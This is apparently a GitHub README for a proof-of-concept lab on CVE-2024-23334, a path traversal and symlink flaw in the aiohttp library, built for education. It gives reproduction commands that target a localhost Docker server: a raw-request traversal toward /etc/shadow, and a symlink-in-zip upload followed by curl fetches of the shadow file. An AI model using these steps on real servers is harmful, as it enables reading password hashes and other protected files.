This repository contains a proof of concept about the exploitation of the aiohttp library for the reported vulnerability CVE-2024-23334.
This was created for two reasons:
- Educational purposes: for those who are starting in application security, it is helpful to see the steps to reproduce a vulnerability as well as understanding the concepts behind it.
- Fixing steps: sharing mitigation steps in order to fix the issue.
For more information, visit my website: https://brianre.dev/
- Install Docker
- Install Python3
- Clone this repo locally.
- Run the following command to build the image:
make build- Run the following command to run the container:
make runIf you want to run docker in detached mode, just run:
make rund- Make a request with the url modified to perform path traversal and exploit Local File Inclusion vulnerability (LFI): To execute the exploit, run the following script:
python3 exploits/exploit_path_traversal.pyBy running the script, we are performing a RAW HTTP request to the server. We do it this way and not by using curl or accessing directly in the browser because thse tools includes sanitizing and normalizing URLs before sending the HTTP request. This includes path Normalization: tools like curl and browsers will process the URL path, removing sequences like .. that are used for directory traversal. Therefore, a path like /static/../../../../../../../../../../../../etc/shadow will be normalized to /etc/shadow, and since such a path does not typically exist as a resource on a standard web server, it results in a 404 error.
- There is already created a symlink to a restricted file, such as /etc/shadow. This scenario is the most improbable, but maybe someone internally from the company can leak information using this and people may not check the static logs. And in case static file access is not logged, it is very difficult to identify when it was leaked.
The scenario created in this repo was just for explaining the vulnerability and prooving that it exists and is still exploitable.
- Someone can upload a symlink to the server and exploit. This is a more real scenario, where what I do is to upload a symlink generated on my computer, and then I access to that file so I can retrieve a file such as /etc/shadow.
The way of performing this is with a compressed file, so that way we are able to upload the symlink and, when uncompressed in the server, it generates that same symlink. Uploading a symlink through curl directly as a link.jpeg file will only read the local file that the symlink is targeting and will upload the original file instead. So, if we want to target a specific path of the server filesystem, we should be able to upload a compressed file, such as .zip or .tar.gz.
To reproduce this second scenario, you have to follow these steps:
touch /etc/shadow # It creates a file on your machine on the specified directory. Be sure that you don't replace an existing file.
ln -s /etc/shadow exploit.jpeg # Creates a symlink with the /etc/shadow file and name it exploit.jpeg
zip -y images.zip exploit.jpeg # Zip the symlink
curl -X POST -F "file=@images.zip" http://localhost:8080/upload # Upload the zip file
curl -o shadow.txt http://localhost:8080/static/exploit.jpeg # Access the symlink and, because aiohttp has the vulnerability, it returns the /etc/shadow from the server.TODO
In order to set up the project locally to develop, you have to:
- Create virtual environment.
python3 -m venv env- Install dependencies.
pip3 install -r requirements.txt
pip3 install -r test-requirements.txt